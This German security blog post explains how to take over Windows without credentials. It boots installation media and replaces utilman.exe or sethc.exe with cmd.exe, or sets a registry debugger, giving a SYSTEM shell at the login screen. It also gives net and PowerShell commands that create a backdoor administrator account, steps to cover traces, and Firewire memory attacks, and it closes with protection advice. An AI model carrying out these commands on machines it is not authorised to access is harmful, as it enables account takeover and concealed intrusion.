Vollzugriff auf Windows ohne Benutzernamen und Passwort

Wenn sich ein Anwender an einem Windows-PC anmelden möchte, so benötigt er dazu eine Benutzernamen und ein Passwort (Credential). Neben diesem normalen Weg sich Zugang zu einem Windows-PC (oder Server) zu verschaffen, gibt es einige Möglichkeiten, wie Sie auch ohne die erforderlichen Credentials Zugriff auf ein System erhalten. Einige dieser Möglichkeiten möchte ich Ihnen im folgenden Blogartikel vorstellen

  • Bootdatenträger
  • Firewire-Schnittstelle

Bootdatenträger

Bei der Installation von Windows hat man die Möglichkeit auf Laufwerke zuzugreifen. Dies ist auch sehr sinnvoll und hat mir schon mehrfach ein System gerettet. Solange es sich dabei um mein System handelt, ist dies auch kein Problem. Erhält aber jemand Zugriff auf ein fremdes System, kann ein Unbefugter dadurch sehr schnell das Windows vollständig übernehmen. In den beiden im vorhergehenden Artikel genannten Videos wird auch auf diese Schwachstelle eingegangen, jedoch mit unterschiedlicher Vorgehensweise und Ergebnisse.

Der Ablauf dafür ist sehr einfach: Installationsdatenträger von Windows einlegen (CD, DVD, USB) und System neu starten. Beim Start das Bootmenü auswählen und von dem entsprechenden Datenträger booten. Sobald das Windows Setup-Fenster erscheint, können Sie durch Drücken der Tastenkombination Shift-F10 ein Kommandofenster öffnen.

image_thumb1

Alternativ können Sie auch über die Reparaturoptionen zu diesem Fenster kommen.

Dieser Zugriff funktioniert nicht nur in Windows 7 oder 8(.1), sondern kann auch auf einem Windows Server ab Version 2008 durchgeführt werden. Interessant ist, dass es sogar auf einen Domain Controller funktioniert und man damit beispielsweise das Domain Admin-Passwort zurücksetzen kann.

UTILMAN.EXE/SETHC.EXE –> CMD.EXE

In dem Video von Oleg wird sehr anschaulich demonstriert, wie man durch eine kleine Änderung an Windows in der Lage ist, Befehle mit Systemrechten auszuführen. Dazu muss lediglich die Datei UTILMAN.EXE im System32-Verzeichnis durch ein anderes Programm ersetzen. Er verwendet dafür, der Einfachheit halber, CMD.EXE. Dieses Vorgehen ist nicht neu und im Internet an vielen Stellen bereits hinreichend beschrieben. Prinzipiell gibt es dafür zwei Varianten:

Variante1

Hier wird, entsprechend Olegs Anleitung das bestehende Programm UTILMAN.EXE einfach durch einen Kopiervorgang durch CMD.EXE ersetzt. Damit das Verfahren wieder rückgängig gemacht werden kann, lege ich dazu vorher noch eine Kopie des Programms an.

copy c:\windows\system32\utilman.exe c:\windows\system32\utilman.exe.bak
copy c:\windows\cmd.exe c:\windows\system32\utilman.exe

Das war es dann auch schon und Sie können den PC neu starten.

Variante 2

Eine andere Variante besteht darin die Registry des Systems so anzupassen, dass CMD als Debugger zum UTILMAN.EXE gestartet wird. Dieser Weg ist nicht so offensichtlich wie der erste Weg, da keine Dateien ersetzt werden, sondern nur eine sehr kleine Änderung an der Registry vorgenommen wird.

Bevor Sie die Registry eines “externen” Windows-Systems anpassen können, müssen Sie den Registry Hive von der Festplatte in die Startumgebung laden. Dazu müssen Sie folgenden Befehl ausführen:

REG LOAD hklm\m c:\Windows\System32\config\SOFTWARE

Anschließend können Sie den Debugger für Utilman.exe einrichten, indem Sie folgenden Registry-Eintrag setzen:

REG ADD "HKLM\m\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "cmd.exe"

Nachdem Sie den Registry Hive vom Windows-System geladen haben, können Sie dies auch direkt mit dem Registry Editor bearbeiten. Dabei sollten Sie jedoch darauf achten, dass Sie den Bereich verwenden, den Sie vorher geladen haben.

Reg_thumb3

Der gleiche Weg funktioniert auch mit dem Befehl SETHC.EXE. Dieser ist dafür verantwortlich die Einrastfunktion für Tasten bei fünfmaligen Drücken zu aktivieren.

Reg2_thumb[2]

Aktivieren können Sie dieses Programm, indem Sie in dem Registry Hive den Debugger statt für utilman.exe für das Programm sethc.exe aktivieren.

REG ADD "HKLM\m\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "cmd.exe"

Ausführung

Danach starten Sie den Computer neu – vorher können Sie das Installationsmedium wieder aus dem System entfernen.

Wenn Sie die Aktivierung über UTILMAN.EXE gewählt haben, müssen Sie im Anmeldefenster auf den Knopf für “Center für erleichterte Bedienung” drücken oder die Tastenkombination <Windows Taste>+U und schon erscheint ein neues Kommandofenster. Haben Sie den Weg über SETHC.EXE gewählt, drücken Sie fünfmal eine der folgenden Tasten: Windows-Logo-Taste, Umschalttaste, Steuerungstaste oder ALT-Taste.

image_thumb3

Die Besonderheit dieses Fensters ist, dass es im Kontext des Systems gestartet wurde und Sie somit Zugriff auf den Computer haben, wie das System selbst. Die Vorgehensweise hat gewisse Vorteile z. B. dann, wenn man das Administratorpasswort vergessen hat oder wenn man am System Anpassungen vornehmen muss, die in einem normalen Benutzerkontext nicht möglich sind.

Jedoch bietet dieser Zugang zu einem Computer auch viele Möglichkeiten für Leute, die sie ärgern oder auch wirklich schaden wollen. Im Folgenden möchte ich Ihnen dafür einige Beispiele liefern.

Im ersten Beispiel möchte ich den Inhalt des Bildschirms auf den Kopf stellen. Sie werden sehen, dass jeder Ihrer Kollegen diesen Scherz lustig finden wird (oder auch nicht). Dazu ist es erforderlich eine kleine Änderung in der Registry auf dem System vorzunehmen. Im ersten Schritt müssen Sie nun einen anderen Registry Hive laden (System). Danach können Sie entsprechend des standardmäßig verwendeten Controlset die Bildschirmrotation festlegen:

REG LOAD hklm\y c:\Windows\System32\config\system

REG ADD "HKLM\y\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}000" /v Display1_RotationCaps /t REG_DWord /d 7

bild3

In einem zweiten Beispiel lege ich ein neues Benutzerkonto auf dem Computer an und nehme dieses Konto in die Gruppe der lokalen Administratoren auf. Der erste Befehl der folgenden Befehlssequenz zeigt Ihnen an, wer alles Mitglied der Gruppe der lokalen Administratoren (auf englischsprachigen Systemen “administrators”) ist. Mit dem nächsten Befehl legen Sie einen neuen Benutzer auf dem Computer an und der letzter Befehl macht diesen Benutzer zum neuen Administrator.

net localgroup administratoren
net user DummyAdmin P@ssw0rd /ADD
net localgroup administratoren DummyAdmin /ADD

Um die anderen Administratoren zu ärgern, könnte man diese jetzt beispielsweise deaktivieren oder einfach nur deren Passwort ändern.

Da mir die Kommando-Konsole nur sehr wenig Befehle zur Verfügung stellt, will ich einfach auf die PowerShell wechseln. Dazu geben Sie einfach im Kommandofenster

PowerShell

ein.

Die oben beschriebene Befehlssequenz ist nun etwas länger, jedoch bietet Sie Ihnen wesentlich mehr Möglichkeiten:

$group = [ADSI]"WinNT://$env:ComputerName/Administrators,Group"
@($group.psbase.Invoke("Members"))| foreach {
$_.GetType().InvokeMember("Name", 'GetProperty', $null, $_, $null)
}
$TestUser = $Computer.Create("User", "DummyAdmin")
$TestUser.SetPassword("P@ssw0rd")
$TestUser.UserFlags = 65536 # ADS_UF_DONT_EXPIRE_PASSWD
$TestUser.SetInfo()

Aufräumen

Damit man nach dem Einbruch wieder alle Spuren verwischen kann, muss man das System erneut vom Installationsdatenträger neu starten. Dort wieder in die Kommandokonsole gehen und entsprechend der gewählten Variante, die Änderungen wieder rückgängig machen.

Variante 1:

copy c:\windows\system32\utilman.exe.bak c:\windows\system32\utilman.exe

del utilman.exe.bak

Variante 2:

REG LOAD hklm\m c:\Windows\System32\config\SOFTWARE

REG DELETE "HKLM\m\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"

bzw.

REG DELETE "HKLM\m\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"

Schutzmöglichkeit

Verwenden einer Festplattenverschlüsselung z. B. mit Bitlocker: Dadurch können Sie sicherstellen, dass niemand ohne die erforderlichen Schlüssel Zugriff auf die Dateien auf Ihrer Festplatte erhält. Somit schützen Sie nicht nur Ihre Daten vor unerlaubter Zugriff, sondern Ihr gesamtes Unternehmensnetzwerk.

Zusätzlich zur Festplattenverschlüsselung können Sie im BIOS noch die Möglichkeit des Bootens von USB und CD/DVD (im BIOS) deaktivieren. Damit dieser Schutz greift, sollten Sie außerdem noch das BIOS mit einem Passwort schützen. Doch wie bereits angemerkt ist dieser Schutz nur in Verbindung mit einer Festplattenverschlüsselung sinnvoll, denn wenn man eine Festplatte aus einem Rechner aus und in einen anderen einbaut, stehen wieder alle beschriebenen Möglichkeiten zur Verfügung.

Webservice als Hackerwerkzeug

Paula geht in ihrem Video noch einen Schritt weiter und installiert auf dem System auf diesem Weg ein eigenes Programm als neuen Service, das mit einer Webseite kommuniziert. Meldet sich nun ein Benutzer an dem so modifizierten System an, so wird Benutzername und Passwort im Klartext an einen Webservice weitergeleitet, der diese Informationen speichert. Das alles funktioniert vollkommen unsichtbar für den Benutzer im Hintergrund und kann nur mit hohem Aufwand lokalisiert werden. Paula hat freundlicherweise einen entsprechend deutlichen Namen für den Service verwendet, sodass sich dieser schnell herausfinden lässt. Ist ein Angreifer jedoch nicht so freundlich gesinnt, kann er diesen Service auch ohne Probleme verstecken z. B. indem er einen anderen Service ersetzt.

Passwort aus Arbeitsspeicher

Bei Windows (beispielsweise auch iOS) wird das Passwort bei einem laufenden System im Arbeitsspeicher des Computers gehalten und kann somit manipuliert werden. Der normale Zugriff (z. B. über ein Programm) auf diesen Arbeitsspeicherbereich ist nicht möglich, da es sich um einen geschützten Bereich handelt. Jedoch haben einige Schnittstellen am Computer die Möglichkeit auch auf solche Arbeitsspeicherbereiche zuzugreifen. Bereits in 2005 hat Dr. Maximillian Dornseif auf eine mögliche Bedrohung bei der Verwendung der Firewire-Schnittstelle auf dieses Problem hingewiesen und bereits erste Tools dazu im praktischen Einsatz gezeigt.

Software

Da die Welt nicht still steht, haben sich seitdem die Tools dazu weiterentwickelt und stehen zwischenzeitlich als OpenSource für jeden zugänglich zur Verfügung. Die Installation und die Verwendung dieser Tools ist sehr einfach und auch für Laien ohne großen Aufwand umzusetzen. Dazu gibt es entsprechenden Anleitungen im Internet, wie z. B. unter http://www.breaknenter.org/projects/inception.

Das einzige Equipment, das man für einen solchen Angriff benötigt, ist ein PC (mit Linux – LiveCD geht auch) und ein Firewire-Kabel. Installiert man nun auf dem entsprechenden PC (mit Linux) die Software (aus dem Internet) und verbindet anschließend das WireFire-Kabel von dem Linux-PC mit einem gesperrten Windows-PC, so setzt die Software das Passwort im Arbeitsspeicher zurück und man kann sich dann ohne Passwort auf dem Windows-PC anmelden (echt krass).

Der Angriff mit dieser Software funktioniert nicht nur auf alle Windows Versionen (x86 und x64), sondern es werden auch einige andere Betriebssysteme wie Mac OS X, Ubuntu oder Linux. Hier ist eine Übersicht:

  • Windows 8.1
  • Windows 8
  • Windows 7
  • Windows Vista
  • Windows XP
  • Mac OS X (Mavericks1, Mountain Lion2, Lion2, Snow Leopard, Leopard)
  • Ubuntu3 (Saucy. Raring, Quantal, Precise, OneiricNatty)

1 Seit Mavericks (10.8.2) wurde VT-D aktiviert, womit der Zugriff über diese Schnittstelle blockiert wird.
2 Wenn FileVault2 aktiviert ist, funktioniert der Zugriff nur, wenn das Betriebssystem nicht gesperrt ist.
3 Andere Linux-Distributionen, die PAM-basierte Authentifizierung unterstützen, haben ebenfalls diese Sicherheitslücke.

Hardware

Für alle jene, denen es zu schwierig ist die Software zu installieren oder die Aufgrund von Sicherheitseinschränkungen keine eigene Computer mit in ein Unternehmen bringen können, gibt es jedoch noch einen viel einfacheren Weg, um diese Sicherheitslücke auszunutzen: CaptureGUARD Gateway – Access to Locked Computers: Bei diesem System handelt es sich um eine ExpressCard, mit der man auf Windows Systemen das Login innerhalb von Sekunden aushebeln kann. Dazu ist es einfach nur erforderlich diese Karte in den ExpressCard-Slot einzustecken, während der PC sich in der Anmeldemaske befindet. Unglaublich? Auf der Webseite des Herstellers wird ein Video gezeigt, der diese Karte in Aktion zeigt – einfach beeindruckend. Mit knapp 5.000$ jedoch auch kein günstiger Spaß.

Scope

Schutzmöglichkeiten
  • Deaktivieren Sie alle Schnittstellen an Ihrem Computer im BIOS, die Sie nicht benötigen.
  • Lassen Sie Ihr laufendes System nicht unbeaufsichtigt – auch wenn dies gesperrt ist.
  • Installieren Sie aktuelle Sicherheitsupdates (BIOS, Betriebssystem, Gerätetreiber, Anwendungen)

Diese Sicherheitslücke ist hausgemacht. Apple hat dieses Problem bei ihren neusten Versionen in Angriff genommen und weitestgehend behoben. Warum Microsoft nicht auch darauf reagiert, wird wohl deren Geheimnis bleiben.

Advertisements
Über

Die IT-Welt wird immer komplexer und zwischen den einzelnen Komponenten gibt es immer mehr Abhängigkeiten. Nachdem ich durch meine tägliche Arbeit immer wieder vor der Herausforderung stehe, komplexe Probleme zu lösen, möchte ich diese Seite dafür verwenden, Euch den einen oder anderen Tipp zu geben, wenn Ihr vor ähnlichen Aufgabenstellungen steht.

Veröffentlicht in Sicherheit

Kommentar verfassen

Trage deine Daten unten ein oder klicke ein Icon um dich einzuloggen:

WordPress.com-Logo

Du kommentierst mit Deinem WordPress.com-Konto. Abmelden / Ändern )

Twitter-Bild

Du kommentierst mit Deinem Twitter-Konto. Abmelden / Ändern )

Facebook-Foto

Du kommentierst mit Deinem Facebook-Konto. Abmelden / Ändern )

Google+ Foto

Du kommentierst mit Deinem Google+-Konto. Abmelden / Ändern )

Verbinde mit %s

%d Bloggern gefällt das: